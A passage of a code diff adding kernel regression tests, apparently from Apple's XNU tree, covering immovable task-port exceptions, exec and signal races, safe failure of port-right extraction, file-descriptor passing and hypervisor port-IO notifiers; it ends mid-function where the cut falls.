task_exc_guard exception has been enabled\n"); + int ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0); + T_EXPECT_POSIX_SUCCESS(ret, "sysctlbyname(kern.ipc_control_port_options)"); + + if ((opts & 0x30) == 0) { + T_SKIP("immovable rights aren't enabled"); + } + + kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &mp); + T_EXPECT_MACH_SUCCESS(kr, "task_get_special_port"); + T_EXPECT_NE(mp, mach_task_self(), "should receive movable port"); + + /* + * do not deallocate the port we received on purpose to check + * that the exception will not coalesce with the movable port + * we have in our space now + */ + + run_exception_handler(exc_port, exc_immovable_handler); + *(void *volatile*)0 = 0; +} diff --git a/tests/exception_tests.entitlements b/tests/exception_tests.entitlements new file mode 100644 index 000000000..bfd52f6ae --- /dev/null +++ b/tests/exception_tests.entitlements @@ -0,0 +1,8 @@ + + + + + com.apple.security.get-movable-control-port + + + diff --git a/tests/exec-race-58566604.c b/tests/exec-race-58566604.c new file mode 100644 index 000000000..939daf047 --- /dev/null +++ b/tests/exec-race-58566604.c @@ -0,0 +1,171 @@ +#include +#include +#include +#include +#include +#include +#include +#include + +#include + +// rdar://58566604 +// Exercise races of signal delivery vs exec in multi-threaded processes + +T_GLOBAL_META(T_META_NAMESPACE("xnu.exec"), + T_META_CHECK_LEAKS(false), + T_META_ALL_VALID_ARCHS(true)); + +enum { KILL_ONCE, KILL_MANY, KILL_LAST } kill_mode; +enum { EXEC_FIRST, EXEC_SECOND, EXEC_LAST } exec_mode; + +static int fd[2]; + +static void +do_exec(void) +{ + char echo_arg[50] = ""; + + snprintf(echo_arg, sizeof(echo_arg), " Child[%d] says hello after exec", getpid()); + + char * new_argv[] = { + "/bin/echo", + echo_arg, + NULL + }; + + int ret = execv(new_argv[0], new_argv); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "execv()"); +} + +static void* +thread_main(void* arg) +{ + T_LOG("mode: %d, %d: Child[%d] created second thread\n", + kill_mode, exec_mode, getpid()); + + if (exec_mode == EXEC_SECOND) { + int ret = dprintf(fd[1], "Hi!"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "dprintf()"); + do_exec(); + } + + while (1) { + } + return NULL; +} + +void +run_test(void) +{ + T_LOG("mode: %d, %d: Parent[%d]: forking\n", + kill_mode, exec_mode, getpid()); + + pid_t child_pid = fork(); + + T_QUIET; T_ASSERT_POSIX_SUCCESS(child_pid, "fork()"); + + int ret = 0; + + if (child_pid == 0) { + pthread_t thread; + ret = pthread_create(&thread, NULL, thread_main, NULL); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create()"); + + if (exec_mode == EXEC_FIRST) { + ret = dprintf(fd[1], "Hi!"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "dprintf()"); + + do_exec(); + } + + while (1) { + } + } else { + char buffer[4] = ""; + ret = read(fd[0], buffer, sizeof(buffer)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "read()"); + + T_LOG("mode: %d, %d: Parent[%d]: got: '%s' from execing child, trying to kill and wait\n", + kill_mode, exec_mode, getpid(), buffer); + + int killcount = 0, status = 0, waitedpid = 0; + + switch (kill_mode) { + case KILL_ONCE: + ret = kill(child_pid, SIGKILL); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kill()"); + + waitedpid = waitpid(child_pid, &status, 0); + + T_QUIET; T_ASSERT_POSIX_SUCCESS(waitedpid, "waitpid()"); + + killcount++; + break; + case KILL_MANY: + while (waitedpid == 0) { + ret = kill(child_pid, SIGKILL); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kill()"); + + waitedpid = waitpid(child_pid, &status, WNOHANG); + T_QUIET; T_ASSERT_POSIX_SUCCESS(waitedpid, "waitpid()"); + + killcount++; + } + break; + default: + break; + } + + T_LOG("mode: %d, %d: Parent[%d]: waitpid returned: %d, errno %d (%s), exit signal %d, after %d loops\n", + kill_mode, exec_mode, getpid(), waitedpid, errno, strerror(errno), WTERMSIG(status), killcount); + } +} + +T_DECL(exec_exit_race_once_first, "Exec-exit race, one kill, exec on first thread") { + int rv = pipe(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()"); + + kill_mode = KILL_ONCE; + exec_mode = EXEC_FIRST; + + for (int i = 0; i < 1000; i++) { + run_test(); + } +} + +T_DECL(exec_exit_race_many_first, "Exec-exit race, many kill, exec on first thread") { + int rv = pipe(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()"); + + kill_mode = KILL_MANY; + exec_mode = EXEC_FIRST; + + for (int i = 0; i < 1000; i++) { + run_test(); + } +} + +T_DECL(exec_exit_race_once_second, "Exec-exit race, one kill, exec on second thread") { + int rv = pipe(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()"); + + kill_mode = KILL_ONCE; + exec_mode = EXEC_SECOND; + + for (int i = 0; i < 1000; i++) { + run_test(); + } +} + +T_DECL(exec_exit_race_many_second, "Exec-exit race, many kill, exec on second thread") { + int rv = pipe(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()"); + + kill_mode = KILL_MANY; + exec_mode = EXEC_SECOND; + + for (int i = 0; i < 1000; i++) { + run_test(); + } +} diff --git a/tests/extract_right_soft_fail.c b/tests/extract_right_soft_fail.c new file mode 100644 index 000000000..006512ae4 --- /dev/null +++ b/tests/extract_right_soft_fail.c @@ -0,0 +1,114 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IKOT_TASK_CONTROL 2 + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(TRUE)); + +static void +test_extract_immovable_task_port(pid_t pid) +{ + kern_return_t kr; + mach_port_t tport = MACH_PORT_NULL; + ipc_info_space_t space_info; + ipc_info_name_array_t table; + mach_msg_type_number_t tableCount; + ipc_info_tree_name_array_t tree; /* unused */ + mach_msg_type_number_t treeCount; /* unused */ + + mach_port_t extracted; + mach_msg_type_name_t right; + + + kr = task_for_pid(mach_task_self(), pid, &tport); + T_EXPECT_MACH_SUCCESS(kr, "task_for_pid(), tport: 0x%x", tport); + + T_LOG("Target pid: %d", pid); + + if (pid == getpid()) { + /* self extraction should succeed */ + kr = mach_port_extract_right(mach_task_self(), mach_task_self(), MACH_MSG_TYPE_COPY_SEND, &extracted, &right); + T_EXPECT_MACH_SUCCESS(kr, "mach_port_extract_right() on immovable port in current space should succeed"); + } else { + unsigned int kotype = 0, kobject = 0; + mach_port_name_t tport_name = MACH_PORT_NULL; + kr = mach_port_space_info(tport, &space_info, &table, &tableCount, &tree, &treeCount); + T_EXPECT_MACH_SUCCESS(kr, "mach_port_space_info()"); + + for (int i = 0; i < tableCount; i++) { + T_LOG("Searching for task port..name: 0x%x", table[i].iin_name); + kr = mach_port_kernel_object(tport, table[i].iin_name, &kotype, &kobject); + if (KERN_SUCCESS == kr && kotype == IKOT_TASK_CONTROL) { + tport_name = table[i].iin_name; + break; + } else if (kr) { + T_LOG("mach_port_kernel_object() failed on name 0x%x, kr: 0x%x", table[i].iin_name, kr); + } + } + + if (!tport_name) { + T_FAIL("Did not find task port in child's space"); + } + T_LOG("Remote tport name: 0x%x", tport_name); + kr = mach_port_extract_right(tport, tport_name, MACH_MSG_TYPE_COPY_SEND, &extracted, &right); + T_EXPECT_EQ(kr, KERN_INVALID_CAPABILITY, "mach_port_extract_right() on immovable port in child's space should fail (no crash): 0x%x", kr); + + T_LOG("Still alive.."); + } +} + +T_DECL(extract_right_soft_fail, "Test mach_port_extract_right() fail on extracting child process's task port without crash", + T_META_CHECK_LEAKS(false)) +{ + uint32_t opts = 0; + size_t size = sizeof(&opts); + pid_t child_pid; + kern_return_t ret; + int status, fd[2]; + + T_LOG("Check if immovable control port has been enabled\n"); + ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0); + + if (!ret && (opts & 0x20) == 0) { + T_SKIP("immovable control port hard enforcement isn't enabled"); + } + + /* extracting mach_task_self() should succeed */ + test_extract_immovable_task_port(getpid()); + + ret = pipe(fd); + T_EXPECT_NE(ret, -1, "pipe creation"); + + + child_pid = fork(); + + if (child_pid < 0) { + T_FAIL("fork failed()"); + } + + if (child_pid == 0) { + close(fd[0]); + write(fd[1], "wakeup", 6); + close(fd[1]); + } else { + close(fd[1]); + char data[6]; + read(fd[0], data, 6); /* blocks until data available */ + close(fd[0]); + + /* extracting child's immovable task port should fail without crash */ + test_extract_immovable_task_port(child_pid); + + kill(child_pid, SIGKILL); + wait(&status); + } +} diff --git a/tests/fd_send.c b/tests/fd_send.c new file mode 100644 index 000000000..53aa3687c --- /dev/null +++ b/tests/fd_send.c @@ -0,0 +1,207 @@ +#include +#include +#include +#include +#include +#include + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.fd"), + T_META_RUN_CONCURRENTLY(true)); + + +#define SOCKETPAIR(pair) \ + T_ASSERT_POSIX_SUCCESS(socketpair(PF_LOCAL, SOCK_STREAM, 0, pair), "socketpair") + + +static errno_t +send_fd(int sock, int fd) +{ + struct iovec iovec[1]; + struct msghdr msg; + struct cmsghdr *cmsghdrp; + char buf[CMSG_SPACE(sizeof(int))]; + + iovec[0].iov_base = ""; + iovec[0].iov_len = 1; + msg.msg_name = 0; + msg.msg_namelen = 0; + msg.msg_iov = iovec; + msg.msg_iovlen = 1; + msg.msg_control = buf; + msg.msg_controllen = CMSG_SPACE(sizeof(int)); + + cmsghdrp = CMSG_FIRSTHDR(&msg); + cmsghdrp->cmsg_len = CMSG_LEN(sizeof(int)); + cmsghdrp->cmsg_level = SOL_SOCKET; + cmsghdrp->cmsg_type = SCM_RIGHTS; + + memcpy(CMSG_DATA(cmsghdrp), &fd, sizeof(fd)); + + if (sendmsg(sock, &msg, 0) < 0) { + return errno; + } + + return 0; +} + +static errno_t +recv_fd(int sock, int *fdp) +{ + u_char c; + struct iovec iovec[1]; + struct msghdr msg; + struct cmsghdr *cmsghdrp; + char buf[CMSG_SPACE(sizeof(int))]; + + iovec[0].iov_base = &c; + iovec[0].iov_len = 1; + + msg.msg_name = 0; + msg.msg_namelen = 0; + msg.msg_iov = iovec; + msg.msg_iovlen = 1; + msg.msg_control = buf; + msg.msg_controllen = CMSG_SPACE(sizeof(int)); + msg.msg_flags = 0; + + if (recvmsg(sock, &msg, 0) < 0) { + return errno; + } + + cmsghdrp = CMSG_FIRSTHDR(&msg); + if (cmsghdrp == NULL) { + return ENOENT; + } + + if (cmsghdrp->cmsg_len != CMSG_LEN(sizeof(int))) { + return ENOENT; + } + if (cmsghdrp->cmsg_level != SOL_SOCKET) { + return ENOENT; + } + if (cmsghdrp->cmsg_type != SCM_RIGHTS) { + return ENOENT; + } + + memcpy(fdp, CMSG_DATA(cmsghdrp), sizeof(*fdp)); + return 0; +} + +T_DECL(send, "test for 30465592") +{ + int pair[2], fd, status; + pid_t child; + + T_ASSERT_POSIX_SUCCESS(socketpair(PF_LOCAL, SOCK_STREAM, 0, pair), + "socketpair"); + + child = fork(); + if (child != 0) { + fd = open("/dev/null", O_RDWR); + T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)"); + + T_ASSERT_EQ(send_fd(pair[0], fd), 0, "send_fd"); + T_ASSERT_POSIX_SUCCESS(close(fd), "close(fd)"); + + T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid"); + } else { + T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd"); + T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)"); + raise(SIGKILL); /* do not confuse the test system */ + } +} + +T_DECL(send_kill, "test for 30465592") +{ + int pair[2], fd, status; + pid_t child; + + T_QUIET; SOCKETPAIR(pair); + + child = fork(); + if (child != 0) { + fd = open("/dev/null", O_RDWR); + T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)"); + + T_ASSERT_EQ(send_fd(pair[0], fd), 0, "send_fd"); + T_ASSERT_POSIX_SUCCESS(close(fd), "close(fd)"); + + T_EXPECT_POSIX_SUCCESS(kill(child, SIGKILL), "kill(child)"); + + T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid"); + } else { + T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd"); + T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)"); + raise(SIGKILL); /* do not confuse the test system */ + } +} + +T_DECL(send_sock, "test for 30465592") +{ + int pair[2], fd, status; + pid_t child; + + T_QUIET; SOCKETPAIR(pair); + + child = fork(); + if (child != 0) { + int sock[2]; + + T_QUIET; SOCKETPAIR(sock); + + T_ASSERT_EQ(send_fd(pair[0], sock[0]), 0, "send_fd"); + T_ASSERT_POSIX_SUCCESS(close(sock[0]), "close(sock[0])"); + T_ASSERT_POSIX_SUCCESS(close(sock[1]), "close(sock[1])"); + + T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid"); + } else { + T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd"); + T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)"); + raise(SIGKILL); /* do not confuse the test system */ + } +} + +T_DECL(send_stress, "test for 67133384") +{ + int fd; + + fd = open("/dev/null", O_RDWR); + T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)"); + + dispatch_apply(10, NULL, ^(size_t worker) { + dispatch_queue_t q = dispatch_queue_create("receiver", NULL); + dispatch_group_t g = dispatch_group_create(); + int pairbuf[2], *pair = pairbuf; + int n = 1000; + + SOCKETPAIR(pair); + + dispatch_group_async(g, q, ^{ + int tmp; + + for (int i = 0; i < n; i++) { + T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &tmp), 0, "recv_fd"); + T_QUIET; T_ASSERT_NE(tmp, -1, "received a proper fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(tmp), "close(tmp)"); + } + }); + dispatch_release(q); + + for (int i = 0; i < n; i++) { + int tmp = dup(fd); + T_QUIET; T_ASSERT_POSIX_SUCCESS(tmp, "dup"); + T_QUIET; T_ASSERT_EQ(send_fd(pair[0], tmp), 0, "send_fd"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(tmp), "close(tmp)"); + } + dispatch_group_wait(g, DISPATCH_TIME_FOREVER); + + T_PASS("sent and received %d fds in worker %zd", n, worker); + + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(pair[0]), "close(pair[0])"); + T_QUIET; T_EXPECT_POSIX_SUCCESS(close(pair[1]), "close(pair[1])"); + }); +} diff --git a/tests/fp_exception.c b/tests/fp_exception.c index 12f09d0e8..aaf0610b9 100644 --- a/tests/fp_exception.c +++ b/tests/fp_exception.c @@ -54,6 +54,8 @@ static volatile bool mach_exc_caught = false; #ifdef __arm64__ static size_t exc_arithmetic_handler( + __unused mach_port_t task, + __unused mach_port_t thread, exception_type_t type, mach_exception_data_t codes_64) { diff --git a/tests/hv_private.entitlements b/tests/hv_private.entitlements deleted file mode 100644 index e6cea6583..000000000 --- a/tests/hv_private.entitlements +++ /dev/null @@ -1,8 +0,0 @@ - - - - - com.apple.private.hypervisor - - - diff --git a/tests/hv_public.entitlements b/tests/hv_public.entitlements deleted file mode 100644 index c2ef1a38b..000000000 --- a/tests/hv_public.entitlements +++ /dev/null @@ -1,8 +0,0 @@ - - - - - com.apple.security.hypervisor - - - diff --git a/tests/hvtest_x86.m b/tests/hvtest_x86.m index 0aebb6bc1..65e885e43 100644 --- a/tests/hvtest_x86.m +++ b/tests/hvtest_x86.m @@ -569,8 +569,11 @@ vm_setup() static void vm_cleanup() { - T_ASSERT_EQ(hv_vm_destroy(), HV_SUCCESS, "Destroyed vm"); + T_ASSERT_EQ(hv_vm_destroy(), HV_SUCCESS, "Destroyed vm"); free_page_cache(); + + pml4 = NULL; + pml4_gpa = 0; } static pthread_cond_t ready_cond = PTHREAD_COND_INITIALIZER; @@ -1246,3 +1249,392 @@ T_DECL(radar63641279, "rdar://63641279 (Evaluate \"no SMT\" scheduling option/si vm_cleanup(); } + +// Get the number of messages waiting for the specified port +static int +get_count(mach_port_t port) +{ + int count; + + count = 0; + while (true) { + hv_ion_message_t msg = { + .header.msgh_size = sizeof (msg), + .header.msgh_local_port = port, + }; + + kern_return_t ret = mach_msg(&msg.header, MACH_RCV_MSG | MACH_RCV_TIMEOUT, + 0, sizeof (msg), port, 0, MACH_PORT_NULL); + + if (ret != MACH_MSG_SUCCESS) { + break; + } + + T_QUIET; T_ASSERT_TRUE(msg.addr == 0xab || msg.addr == 0xcd || msg.addr == 0xef, + "address is 0xab, 0xcd or 0xef"); + T_QUIET; T_ASSERT_EQ(msg.value, 0xaaULL, "value written is 0xaa"); + T_QUIET; T_ASSERT_TRUE(msg.size == 1 || msg.size == 4, "size is 1 or 4"); + + count++; + } + + return count; +} + +static void * +pio_monitor(void *arg, hv_vcpuid_t vcpu) +{ + + size_t guest_pages_size = round_page((uintptr_t)&hvtest_end - (uintptr_t)&hvtest_begin); + const size_t mem_size = 1 * 1024 * 1024; + uint8_t *guest_pages_shadow = valloc(mem_size); + int handle_io_count = 0; + uint64_t exit_reason = 0; + + setup_real_mode(vcpu); + + bzero(guest_pages_shadow, mem_size); + memcpy(guest_pages_shadow+0x1000, &hvtest_begin, guest_pages_size); + + T_ASSERT_EQ(hv_vm_map(guest_pages_shadow, 0x0, mem_size, HV_MEMORY_READ | HV_MEMORY_EXEC), HV_SUCCESS, + "map guest memory"); + + while (true) { + T_QUIET; T_ASSERT_EQ(hv_vcpu_run_until(vcpu, ~(uint64_t)0), HV_SUCCESS, "run VCPU"); + exit_reason = get_vmcs(vcpu, VMCS_RO_EXIT_REASON); + + if (exit_reason == VMX_REASON_VMCALL) { + break; + } + + if (exit_reason == VMX_REASON_IRQ) { + continue; + } + + T_QUIET; T_ASSERT_EQ(exit_reason, (uint64_t)VMX_REASON_IO, "exit reason is IO"); + + union { + struct { + uint64_t io_size:3; + uint64_t io_dirn:1; + uint64_t io_string:1; + uint64_t io_rep:1; + uint64_t io_encoding:1; + uint64_t __io_resvd0:9; + uint64_t io_port:16; + uint64_t __io_resvd1:32; + } io; + uint64_t reg64; + } info = { + .reg64 = get_vmcs(vcpu, VMCS_RO_EXIT_QUALIFIC), + }; + + T_QUIET; T_ASSERT_EQ(info.io.io_port, 0xefULL, "exit is a port IO on 0xef"); + + handle_io_count++; + + set_vmcs(vcpu, VMCS_GUEST_RIP, get_reg(vcpu, HV_X86_RIP) + get_vmcs(vcpu, VMCS_RO_VMEXIT_INSTR_LEN)); + } + + free(guest_pages_shadow); + + *((int *)arg) = handle_io_count; + + return NULL; +} + +T_DECL(pio_notifier_arguments, "test adding and removing port IO notifiers") +{ + mach_port_t notify_port = MACH_PORT_NULL; + kern_return_t kret = KERN_FAILURE; + hv_return_t hret = HV_ERROR; + + T_SETUPBEGIN; + + /* Setup notification port. */ + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + ¬ify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port, + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + + /* Setup VM */ + vm_setup(); + + T_SETUPEND; + + /* Add with bad size. */ + hret = hv_vm_add_pio_notifier(0xab, 7, 1, notify_port, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad size"); + + /* Add with bad data. */ + hret = hv_vm_add_pio_notifier(0xab, 1, UINT16_MAX, notify_port, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad data"); + + /* Add with bad mach port. */ + hret = hv_vm_add_pio_notifier(0xab, 1, UINT16_MAX, MACH_PORT_NULL, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad port"); + + /* Add with bad flags. */ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, 0xffff); + T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad flags"); + + /* Remove when none are installed. */ + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "removing a non-existent notifier"); + + /* Add duplicate. */ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier"); + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_NE(hret, HV_SUCCESS, "adding duplicate notifier"); + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier"); + + /* Add then remove. */ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier"); + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier"); + + /* Add two, remove in reverse order. */ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding 1st notifier"); + hret = hv_vm_add_pio_notifier(0xab, 2, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding 2nd notifier"); + hret = hv_vm_remove_pio_notifier(0xab, 2, 1, notify_port, HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing 2nd notifier"); + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE); + T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier in reverse order"); + + /* Add with ANY_SIZE and remove. */ + hret = hv_vm_add_pio_notifier(0xab, 0, 1, notify_port, HV_ION_ANY_SIZE); + T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier with ANY_SIZE"); + hret = hv_vm_remove_pio_notifier(0xab, 0, 1, notify_port, HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier with ANY_SIZE"); + + /* Add with ANY_VALUE and remove. */ + hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_ANY_VALUE); + T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier with ANY_VALUE"); + hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier with ANY_VALUE"); + + vm_cleanup(); + + mach_port_mod_refs(mach_task_self(), notify_port, MACH_PORT_RIGHT_RECEIVE, -1); +} + +T_DECL(pio_notifier_bad_port, "test port IO notifiers when the port is destroyed/deallocated/has no receive right") +{ + pthread_t vcpu_thread; + mach_port_t notify_port = MACH_PORT_NULL; + int handle_io_count = 0; + kern_return_t kret = KERN_FAILURE; + hv_return_t hret = HV_ERROR; + + /* Setup VM */ + vm_setup(); + + /* + * Test that nothing bad happens when the notification port is + * added and mach_port_destroy() is called. + */ + + /* Add a notification port. */ + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + ¬ify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + /* Insert send right. */ + kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port, + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + + /* All port writes to 0xef. */ + hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port, + HV_ION_ANY_VALUE | HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xef"); + + /* After adding, destroy the port. */ + kret = mach_port_destroy(mach_task_self(), notify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "destroying notify port"); + + vcpu_thread = create_vcpu_thread((vcpu_entry_function) + (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor, + &handle_io_count); + T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu"); + + /* Expect the messages to be lost. */ + T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when port destroyed"); + + hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef"); + + vm_cleanup(); + + + vm_setup(); + /* + * Test that nothing bad happens when the notification port is added and + * mach_port_mod_refs() is called. + */ + + /* Add a notification port. */ + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + ¬ify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + /* Insert send right. */ + kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port, + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + + /* All port writes to 0xef. */ + hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port, + HV_ION_ANY_VALUE | HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xef"); + + /* After adding, remove receive right. */ + mach_port_mod_refs(mach_task_self(), notify_port, MACH_PORT_RIGHT_RECEIVE, -1); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "removing receive right"); + + vcpu_thread = create_vcpu_thread((vcpu_entry_function) + (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor, + &handle_io_count); + T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu"); + + /* Expect messages to be lost. */ + T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when receive right removed"); + + hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef"); + + vm_cleanup(); + + + vm_setup(); + /* + * Test that nothing bad happens when the notification port is added and + * mach_port_deallocate() is called. + */ + + /* Add a notification port. */ + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + ¬ify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + /* Insert send right. */ + kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port, + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + + /* All port writes to 0xef. */ + hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port, + HV_ION_ANY_VALUE | HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xef"); + + /* After adding, call mach_port_deallocate(). */ + kret = mach_port_deallocate(mach_task_self(), notify_port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "destroying notify port"); + + vcpu_thread = create_vcpu_thread((vcpu_entry_function) + (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor, + &handle_io_count); + T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu"); + + /* Expect messages to be lost. */ + T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when port deallocated"); + + hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef"); + + vm_cleanup(); +} + +T_DECL(pio_notifier, "test port IO notifiers") +{ + #define MACH_PORT_COUNT 4 + mach_port_t notify_port[MACH_PORT_COUNT] = { MACH_PORT_NULL }; + int handle_io_count = 0; + kern_return_t kret = KERN_FAILURE; + hv_return_t hret = HV_ERROR; + + T_SETUPBEGIN; + + /* Setup notification ports. */ + for (int i = 0; i < MACH_PORT_COUNT; i++) { + kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, + ¬ify_port[i]); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port"); + + kret = mach_port_insert_right(mach_task_self(), notify_port[i], notify_port[i], + MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right"); + } + /* Setup VM */ + vm_setup(); + + T_SETUPEND; + + /* Test that messages are properly sent to mach port notifiers. */ + + /* One for all port writes to 0xab. */ + hret = hv_vm_add_pio_notifier(0xab, 0, 0, notify_port[0], + HV_ION_ANY_VALUE | HV_ION_ANY_SIZE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xab"); + + /* One for for 4 byte writes of 0xaa. */ + hret = hv_vm_add_pio_notifier(0xab, 4, 0xaa, notify_port[1], HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for 4 byte writes " + "to port 0xab"); + + /* One for all writes to 0xcd (ignoring queue full errors). */ + hret = hv_vm_add_pio_notifier(0xcd, 0, 0, notify_port[2], + HV_ION_ANY_SIZE | 